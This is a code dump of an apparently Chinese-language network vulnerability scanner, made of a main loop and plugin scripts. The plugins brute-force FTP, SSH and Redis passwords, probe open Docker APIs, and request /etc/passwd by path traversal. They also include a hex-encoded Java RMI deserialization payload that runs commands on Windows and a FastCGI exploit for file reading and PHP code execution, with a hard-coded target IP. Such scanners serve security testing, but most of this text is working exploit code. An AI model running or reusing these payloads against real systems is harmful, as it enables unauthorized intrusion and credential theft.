six==1.14.0 42 | snowballstemmer==2.0.0 43 | Sphinx==2.4.4 44 | sphinx-rtd-theme==0.4.3 45 | sphinxcontrib-applehelp==1.0.2 46 | sphinxcontrib-devhelp==1.0.2 47 | sphinxcontrib-htmlhelp==1.0.3 48 | sphinxcontrib-jsmath==1.0.1 49 | sphinxcontrib-qthelp==1.0.3 50 | sphinxcontrib-serializinghtml==1.1.4 51 | urllib3==1.25.8 52 | webencodings==0.5.1 53 | websocket-client==0.57.0 54 | -------------------------------------------------------------------------------- /scan.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import multiprocessing 3 | import ScanHandler 4 | import HeartBeatHandler 5 | import recovermq,pipmanage 6 | import time 7 | from Utils import mylog 8 | log = mylog.Log().getInstance() 9 | 10 | 11 | if __name__ == "__main__": 12 | # 心跳 13 | multiprocessing.Process(target=HeartBeatHandler.HeartMonitor, args=()).start() 14 | # 失败消息重试 15 | multiprocessing.Process(target=recovermq.recover, args=()).start() 16 | # pip packages 管理 17 | multiprocessing.Process(target=pipmanage.host_pip_install, args=()).start() 18 | # 扫描 19 | log.info("我准备好,要开始监控有没有任务了!!!!ready loop scan....") 20 | ScanHandler.scanmonitor() 21 | # p = multiprocessing.Process(target=test) 22 | # p.start() 23 | # time.sleep(10) 24 | # p.terminate() 25 | # p.join() 26 | # print('end....') 27 | -------------------------------------------------------------------------------- /scripts/Docker远程无密码调用[2375]_f64908f5-46df-4c37-9809-3f6c03a5df0a.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import docker 3 | 4 | 5 | def do(target): 6 | port = '2375' 7 | try: 8 | client = docker.APIClient(base_url='tcp://' + target + ':' + port, timeout=5) 9 | client.version() 10 | return True, '存在Docker无密码远程调用' 11 | except Exception as e: 12 | print(e) 13 | return False, '' -------------------------------------------------------------------------------- /scripts/FTP弱口令扫描[21]_8bddf610-6580-4ece-a96e-d7f5eebe5e94.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | from ftplib import FTP 3 | 4 | def do(target): 5 | port = 21 6 | for user in SEC_USER_NAME: 7 | print(user) 8 | for pwd in SEC_PASSWORD: 9 | print(pwd) 10 | try: 11 | ftp = FTP(target) 12 | ftp.connect(target, port, 20) 13 | if ftp.login(user, pwd).startswith('2'): 14 | return True, user + '存在弱口令: ' + pwd 15 | except Exception as e: 16 | if not str(e).startswith('530'): 17 | print(e) 18 | else: 19 | print(e) 20 | return False, '' -------------------------------------------------------------------------------- /scripts/Java反序列化代码执行[8080]_fc328c6f-a103-4152-8660-de9f2e195911.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import binascii 3 | import socket 4 | import time 5 | 6 | 7 | def do(ip): 8 | port = 8080 9 | timeout = 5 10 | try: 11 | address = (ip, port) 12 | socket.setdefaulttimeout(timeout) 13 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | sock.connect(address) 15 | send_packet_first = "4a524d4900024b000c31302e3130312e32322e333900000000" 16 | send_packet_second = "50aced00057722000000000000000000000000000000000000000000000000000044154dc9d4e63bdf7400057077" \ 17 | "6e6564737d00000001000f6a6176612e726d692e52656d6f746570787200176a6176612e6c616e672e7265666c65" \ 18 | "63742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f49" \ 19 | "6e766f636174696f6e48616e646c65723b7078707372003273756e2e7265666c6563742e616e6e6f746174696f6e" \ 20 | "2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62" \ 21 | "657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e67" \ 22 | "2f436c6173733b707870737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d" \ 23 | "61702e5472616e73666f726d65644d617061773fe05df15a700300024c000e6b65795472616e73666f726d657274" \ 24 | "002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b" \ 25 | "4c001076616c75655472616e73666f726d657271007e000a707870707372003a6f72672e6170616368652e636f6d" \ 26 | "6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c7" \ 27 | "97ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f" \ 28 | "6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707572002d5b4c6f72672e617061636865" \ 29 | "2e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007078" \ 30 | "70000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f" \ 31 | "72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7474" \ 32 | "00124c6a6176612f6c616e672f4f626a6563743b707870767200186a6176612e696f2e46696c654f757470757453" \ 33 | "747265616d00000000000000000000007078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c" \ 34 | "656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce38020003" \ 35 | "5b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400" \ 36 | "124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e" \ 37 | "672f436c6173733b707870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000070" \ 38 | "787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000070787000000001" \ 39 | "767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000070787074000e676574436f6e737472" \ 40 | "7563746f727571007e001d000000017671007e001d7371007e00167571007e001b00000001757200135b4c6a6176" \ 41 | "612e6c616e672e537472696e673badd256e7e91d7b4702000070787000000001740023633a2f77696e646f77732f" \ 42 | "74656d702f4572726f7242617365457865632e636c61737374000b6e6577496e7374616e63657571007e001d0000" \ 43 | "00017671007e001b7371007e00167571007e001b00000001757200025b42acf317f8060854e00200007078700000" \ 44 | "0624cafebabe0000003200650a002000350700360700370a000300380a0002003907003a0a000600350a0002003b" \ 45 | "0a0006003c08003d0a0006003e0a003f00400a003f00410a004200430a001f00440700450700460a001100350800" \ 46 | "470a001100480a0011003e0a001000490a0010003e08004a0a001a004b07004c0a001a004908004d08004e0a001f" \ 47 | "004f0700500700510100063c696e69743e010003282956010004436f646501000f4c696e654e756d626572546162" \ 48 | "6c65010009726561644279746573010029284c6a6176612f696f2f496e70757453747265616d3b294c6a6176612f" \ 49 | "6c616e672f537472696e673b01000d537461636b4d61705461626c6507003607003a07004c01000a457863657074" \ 50 | "696f6e73070052010007646f5f65786563010015284c6a6176612f6c616e672f537472696e673b29560700450700" \ 51 | "450100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b295601000a536f7572636546696c65" \ 52 | "0100124572726f7242617365457865632e6a6176610c002100220100166a6176612f696f2f427566666572656452" \ 53 | "65616465720100196a6176612f696f2f496e70757453747265616d5265616465720c002100530c00210054010016" \ 54 | "6a6176612f6c616e672f537472696e674275666665720c005500560c005700580100010a0c0059005607005a0c00" \ 55 | "5b005c0c005d005e07005f0c006000610c002500260100136a6176612f6c616e672f457863657074696f6e010017" \ 56 | "6a6176612f6c616e672f537472696e674275696c646572010005383838383a0c005700620c0021002e0100043838" \ 57 | "38380c006300640100106a6176612f6c616e672f537472696e670100020d0a01000a636d64202f63206469720c00" \ 58 | "2d002e01000d4572726f7242617365457865630100106a6176612f6c616e672f4f626a6563740100136a6176612f" \ 59 | "696f2f494f457863657074696f6e010018284c6a6176612f696f2f496e70757453747265616d3b2956010013284c" \ 60 | "6a6176612f696f2f5265616465723b2956010008726561644c696e6501001428294c6a6176612f6c616e672f5374" \ 61 | "72696e673b010006617070656e6401002c284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e" \ 62 | "672f537472696e674275666665723b010008746f537472696e670100116a6176612f6c616e672f52756e74696d65" \ 63 | "01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b010004657865630100" \ 64 | "27284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176" \ 65 | "612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f49" \ 66 | "6e70757453747265616d3b01002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f53" \ 67 | "7472696e674275696c6465723b010007696e6465784f66010015284c6a6176612f6c616e672f537472696e673b29" \ 68 | "490021001f0020000000000004000100210022000100230000001d00010001000000052ab70001b1000000010024" \ 69 | "00000006000100000003000900250026000200230000007b0005000500000038bb000259bb0003592ab70004b700" \ 70 | "054cbb000659b700074d2bb60008594ec600112c2db60009120ab6000957a7ffec2cb6000b3a041904b000000002" \ 71 | "00240000001a00060000000600100007001800090021000a002f000d0035000e0027000000110002fd0018070028" \ 72 | "070029fc001607002a002b000000040001002c0009002d002e00020023000000af0006000300000065b8000c2ab6" \ 73 | "000d4c2bb6000eb8000f4dbb001059bb001159b700121213b600142cb60014b60015b70016bf4c2bb600171218b6" \ 74 | "001902a400052bbfbb001059bb001159b700121213b60014bb001a592bb60017b7001bb60014121cb60014b60015" \ 75 | "b70016bf00010000002b002b0010000200240000001e0007000000130008001400100015002b0018002c001a0039" \ 76 | "001c003b001f00270000000c00026b07002ffc000f070030002b000000040001001000090031003200020023000" \ 77 | "000220001000100000006121db8001eb10000000100240000000a00020000002600050027002b00000004000100" \ 78 | "100001003300000002003474000577726974657571007e001d000000017671007e002e737200116a6176612e757" \ 79 | "4696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c" \ 80 | "647078703f4000000000000c7708000000100000000174000576616c756571007e003578787672001b6a6176612" \ 81 | "e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870" 82 | send_packet_third = "50aced00057722000000000000000000000000000000000000000000000000000044" \ 83 | "154dc9d4e63bdf74000570776e6564737d00000001000f6a6176612e726d692e526" \ 84 | "56d6f746570787200176a6176612e6c616e672e7265666c6563742e50726f7879e12" \ 85 | "7da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742" \ 86 | "f496e766f636174696f6e48616e646c65723b7078707372003273756e2e7265666c65637" \ 87 | "42e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646" \ 88 | "c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f" \ 89 | "7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b70787" \ 90 | "0737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170" \ 91 | "2e5472616e73666f726d65644d617061773fe05df15a700300024c000e6b65795472616e73666f7" \ 92 | "26d657274002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472" \ 93 | "616e73666f726d65723b4c001076616c75655472616e73666f726d657271007e000a707870707372003a" \ 94 | "6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e4368" \ 95 | "61696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d657273" \ 96 | "74002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366" \ 97 | "6f726d65723b7078707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c6" \ 98 | "56374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007078700" \ 99 | "00000067372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732" \ 100 | "e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c00" \ 101 | "0969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b707870767200176a61766" \ 102 | "12e6e65742e55524c436c6173734c6f6164657200000000000000000000007078707372003a6f72672e61" \ 103 | "70616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b6572547" \ 104 | "2616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4" \ 105 | "f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b" \ 106 | "69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b707870757200135b4c6a61766" \ 107 | "12e6c616e672e4f626a6563743b90ce589f1073296c02000070787000000001757200125b4c6a6176612e6c616" \ 108 | "e672e436c6173733bab16d7aecbcd5a99020000707870000000017672000f5b4c6a6176612e6e65742e55524c3b" \ 109 | "5251fd24c51b68cd02000070787074000e676574436f6e7374727563746f727571007e001d000000017671007e" \ 110 | "001d7371007e00167571007e001b000000017571007e001b000000017571007e001f000000017372000c6a617661" \ 111 | "2e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726" \ 112 | "9747971007e00184c000466696c6571007e00184c0004686f737471007e00184c000870726f746f636f6c71007e001" \ 113 | "84c000372656671007e0018707870ffffffffffffffff707400112f633a2f77696e646f77732f74656d702f74000074" \ 114 | "000466696c65707874000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e0016757100" \ 115 | "7e001b0000000174000d4572726f7242617365457865637400096c6f6164436c6173737571007e001d00000001767" \ 116 | "200106a6176612e6c616e672e537472696e67a0f0a4387a3bb3420200007078707371007e00167571007e001b00000" \ 117 | "002740007646f5f657865637571007e001d0000000171007e00367400096765744d6574686f647571007e001d0000000" \ 118 | "271007e003671007e00237371007e00167571007e001b0000000270757200135b4c6a6176612e6c616e672e53747269" \ 119 | "6e673badd256e7e91d7b470200007078700000000174000677686f616d69740006696e766f6b657571007e001d00000" \ 120 | "002767200106a6176612e6c616e672e4f626a656374000000000000000000000070787071007e002f73720011" \ 121 | "6a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468" \ 122 | "726573686f6c647078703f4000000000000c7708000000100000000174000576616c756571007e004878787672001b6" \ 123 | "a6176612e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870" 124 | send_data_first = binascii.a2b_hex(send_packet_first) 125 | send_data_second = binascii.a2b_hex(send_packet_second) 126 | send_data_third = binascii.a2b_hex(send_packet_third) 127 | sock.send(send_data_first) 128 | time.sleep(1) 129 | sock.send(send_data_second) 130 | time.sleep(1) 131 | sock.send(send_data_third) 132 | packet=sock.recv(10240) 133 | time.sleep(1) 134 | packet1 = sock.recv(10240) 135 | sock.close() 136 | if b"8888" in packet1: 137 | return True, '存在Java RMI 反序列化代码执行' 138 | except: 139 | pass 140 | return False, '' -------------------------------------------------------------------------------- /scripts/Redis弱口令扫描[6379]_44da507f-5141-425b-b565-651f53eadfdc.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | from redis import Redis 3 | 4 | def do(target): 5 | port = '6379' 6 | for pwd in SEC_PASSWORD: 7 | try: 8 | conn = Redis(host=target, port=port, password=pwd) 9 | if conn.ping(): 10 | return True, ("弱口令: %s" % pwd) 11 | except Exception as e: 12 | print(e) 13 | return False, '' -------------------------------------------------------------------------------- /scripts/SSH弱口令扫描[22]_49145b74-a221-4a41-baf0-03b2351e4634.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | from paramiko import SSHClient, AutoAddPolicy 3 | 4 | 5 | def do(target): 6 | port = 22 7 | client = SSHClient() 8 | client.set_missing_host_key_policy(AutoAddPolicy()) 9 | for user in SEC_USER_NAME: 10 | print(user) 11 | for pwd in SEC_PASSWORD: 12 | print(pwd) 13 | try: 14 | client.connect(target, port, user, pwd, banner_timeout=3000, auth_timeout=10) 15 | return True, ("弱口令:%s, %s" % (user, pwd)) 16 | except Exception as e: 17 | print(e) 18 | return False, '' -------------------------------------------------------------------------------- /scripts/WebServer任意文件读取[80]_c04faae4-33b6-45be-bb7c-6cace5d5d4eb.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import socket 3 | 4 | 5 | def do(ip): 6 | port = 80 7 | try: 8 | socket.setdefaulttimeout(5) 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((ip, int(port))) 11 | flag = b"GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n" 12 | s.send(flag) 13 | data = s.recv(1024) 14 | s.close() 15 | if b'root:' in data and b'nobody:' in data: 16 | return True, "存在WebServer任意文件读取漏洞" 17 | except: 18 | pass 19 | return False, '' 20 | -------------------------------------------------------------------------------- /scripts/dockerdemo.py: -------------------------------------------------------------------------------- 1 | import docker 2 | 3 | 4 | if __name__ == "__main__": 5 | c = docker.DockerClient(base_url='unix:///var/run/docker.sock') 6 | print(c.info()) 7 | 8 | -------------------------------------------------------------------------------- /scripts/fastcgi目录读取_14e0818f-cafd-4fc4-a984-260aa0016765.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import socket 3 | import time 4 | 5 | 6 | def bin2str(data): 7 | data_s = '' 8 | data = data.replace('\n', '') 9 | for _ in data.split(): 10 | data_s += chr(int(_, 16)) 11 | return data_s 12 | 13 | 14 | exp_payload_base = bin2str(""" 15 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 16 | 01 04 00 01 01 14 04 00 0e 04 52 45 51 55 45 53 17 | 54 5f 4d 45 54 48 4f 44 50 4f 53 54 09 5b 50 48 18 | 50 5f 56 41 4c 55 45 61 6c 6c 6f 77 5f 75 72 6c 19 | 5f 69 6e 63 6c 75 64 65 20 3d 20 4f 6e 0a 64 69 20 | 73 61 62 6c 65 5f 66 75 6e 63 74 69 6f 6e 73 20 21 | 3d 20 0a 73 61 66 65 5f 6d 6f 64 65 20 3d 20 4f 22 | 66 66 0a 61 75 74 6f 5f 70 72 65 70 65 6e 64 5f 23 | 66 69 6c 65 20 3d 20 70 68 70 3a 2f 2f 69 6e 70 24 | 75 74 0f 17 53 43 52 49 50 54 5f 46 49 4c 45 4e 25 | 41 4d 45 26 | """) + '{path}' \ 27 | + bin2str(""" 28 | 0d 01 44 4f 43 55 29 | 4d 45 4e 54 5f 52 4f 4f 54 2f 0f 10 53 45 52 56 30 | 45 52 5f 53 4f 46 54 57 41 52 45 67 6f 20 2f 20 31 | 66 63 67 69 63 6c 69 65 6e 74 20 0b 09 52 45 4d 32 | 4f 54 45 5f 41 44 44 52 31 32 37 2e 30 2e 30 2e 33 | 31 0f 08 53 45 52 56 45 52 5f 50 52 4f 54 4f 43 34 | 4f 4c 48 54 54 50 2f 31 2e 31 0e 02 43 4f 4e 54 35 | 45 4e 54 5f 4c 45 4e 47 54 48 36 | """) + '{data_length}' \ 37 | + bin2str(""" 38 | 00 00 00 00 39 | 01 04 00 01 00 00 00 00 01 05 00 01 00 47 01 00 40 | """) + '{php_code}' \ 41 | + bin2str(""" 42 | 00 43 | """) 44 | 45 | poc_payload = bin2str(''' 46 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 47 | 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 48 | 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 49 | 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 50 | 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 51 | 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 52 | 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 53 | 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 54 | 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 55 | 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 56 | 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 57 | ''') 58 | 59 | phpfile_list = [ 60 | # '/usr/share/php/Archive/Tar.php', 61 | # '/usr/share/php/Console/Getopt.php', 62 | '/usr/share/php/OS/Guess.php', 63 | '/usr/share/php/PEAR.php', 64 | # '/usr/share/php/PEAR/Autoloader.php', 65 | # '/usr/share/php/PEAR/Builder.php', 66 | # '/usr/share/php/PEAR/Command.php', 67 | # '/usr/share/php/PEAR/Common.php', 68 | # '/usr/share/php/PEAR/Config.php', 69 | # '/usr/share/php/PEAR/Installer.php', 70 | # '/usr/share/php/PEAR/Packager.php', 71 | # '/usr/share/php/PEAR/REST.php', 72 | # '/usr/share/php/PEAR/Validate.php', 73 | # '/usr/share/php/PEAR/XMLParser.php', 74 | # '/usr/share/php/Structures/Graph.php', 75 | # '/usr/share/php/Structures/Graph/Node.php', 76 | # '/usr/share/php/System.php', 77 | # '/usr/share/php/XML/Util.php', 78 | # '/usr/share/php/pearcmd.php' 79 | ] 80 | 81 | 82 | def send_socket(host, port, timeout, waittime=1, payload=''): 83 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 84 | socket.setdefaulttimeout(timeout) 85 | sock.connect((host, port)) 86 | sock.send(payload.encode('utf-8')) 87 | time.sleep(waittime) 88 | res = sock.recv(1024) 89 | return res 90 | 91 | 92 | def fast_cgi_rce(host, port, php_filepath='', commond=''): 93 | php_code = "" 94 | if commond: 95 | php_code = "" % commond 96 | 97 | exp_payload = exp_payload_base.format( 98 | path=php_filepath, data_length=str(len(php_code)), 99 | php_code=php_code 100 | ) 101 | 102 | res = send_socket(host, port, timeout=5, waittime=1, payload=exp_payload) 103 | if b'0b8c4ba32f584b513cb08b17d638a688' in res: 104 | return True, res 105 | return False 106 | 107 | 108 | def exploit(host, port): 109 | for filepath in phpfile_list: 110 | res = fast_cgi_rce(host, port, php_filepath=filepath) 111 | if res: 112 | return True, '存在任意代码执行漏洞,php文件路径:' + filepath 113 | return False 114 | 115 | 116 | def verify(host, port): 117 | res = send_socket(host, port, timeout=5, waittime=0, payload=poc_payload) 118 | if b':root:' in res: 119 | return True, '存在fastcgi任意文件读取漏洞' 120 | return False 121 | 122 | 123 | def do(host): 124 | info = '' 125 | port = 80 126 | try: 127 | ret = verify(host, port) 128 | if ret: 129 | info += ret[1] 130 | ret = exploit(host, port) 131 | if ret: 132 | info = info + u';' if info else info 133 | info += ret[1] 134 | return info 135 | except Exception as e: 136 | print(e) 137 | return False, '' 138 | 139 | 140 | if __name__ == '__main__': 141 | do('117.51.152.151') 142 | -------------------------------------------------------------------------------- /scripts/ftpweakscan.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import ftplib 3 | 4 | 5 | def do(ip) -> str: 6 | print(ip) 7 | print(SEC_USER_NAME) 8 | print(SEC_PASSWORD) 9 | 10 | return True, "我也不知道为啥出错拉" 11 | -------------------------------------------------------------------------------- /scripts/readme.md: -------------------------------------------------------------------------------- 1 | 这里存放自定义的扫描脚本,按照里面现有模板去写就可以了。 2 | -------------------------------------------------------------------------------- /test.py: -------------------------------------------------------------------------------- 1 | import HeartBeatHandler 2 | from helpers import redishelper 3 | import pipmanage 4 | 5 | if __name__ == '__main__': 6 | # c = redishelper.__get_connection() 7 | # print(redishelper.get_pipupdate()) 8 | pipmanage.host_pip_install() 9 | --------------------------------------------------------------------------------